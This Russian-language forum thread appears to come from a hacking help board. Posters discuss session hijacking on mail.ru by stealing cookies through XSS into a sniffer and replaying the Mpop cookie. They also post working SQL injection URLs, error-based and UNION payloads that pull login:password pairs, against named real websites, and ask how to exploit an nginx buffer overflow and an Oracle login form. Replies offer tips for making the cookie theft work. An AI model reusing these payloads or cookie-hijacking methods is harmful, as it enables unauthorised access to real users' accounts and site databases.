Вопрос касательно хсс на маилру украл я куки к примеру лежат они у меня на сниффере Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся... Как я понял в маилру главная кука отвечающая за вход Mpop меняю mpop в опере и открываю маилру и что же вы думаете? зашел? - НЕТ просит ввести заново пароль при этом кука больше не работает!! Какже зайти на почту с чужих кук?
Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат... Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут. Открываю фаерфокс и плагин в нем (Live http replay) мне нужен был именно он так как очень просто можно заменить все куки запроса Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере. Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер. Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен. А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.
Народ, помогите вывести таблицы.. Code: http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand(0)*%202))having+min(0)+or+1
SELECT 1 from information_schema.tables group by concat((SELECT table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0)
В общем заюзал на одном сайте Nginx stack-based buffer overflow Он выдал вот такую инфу Как это можно использовать.. Для чего эти байты?
Зайди в гугл, ввел HTTP parameter pollution. Открой первую вкладку http://raz0r.name/articles/http-parameter-pollution и прочитай.
приветствую понять не могу что за база на " SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ,linguistics=off),boost=1000), not(*.swf), not(*filtertable*), not(*multimedia_layer_library*), not(*.flash.html), not(*.isng.*), not(*tabcontent*), not(*Search_Results*), not(*medialibrary*), not(*.ngrb.*), not(*media_library*), not(*.pid.*), not(*.redirect.*),filter(and(language: ")ORDER BY 1 SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ORDER ")and(select null) SearchEngineException: parsefql: Query Error: line 1:111: unexpected token: null хелп..
Подскажите пример реализации https://www.site.com/login POST PARAM: firstN=&lastN= DB: ORACLE c чего начать?
А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
Есть сайт со скулей Code: http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+ и админка но ни одна из учёток не подходит. Расскажите, в чём подвог? 2. Не подбирается кол-во столбцов. Code: www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+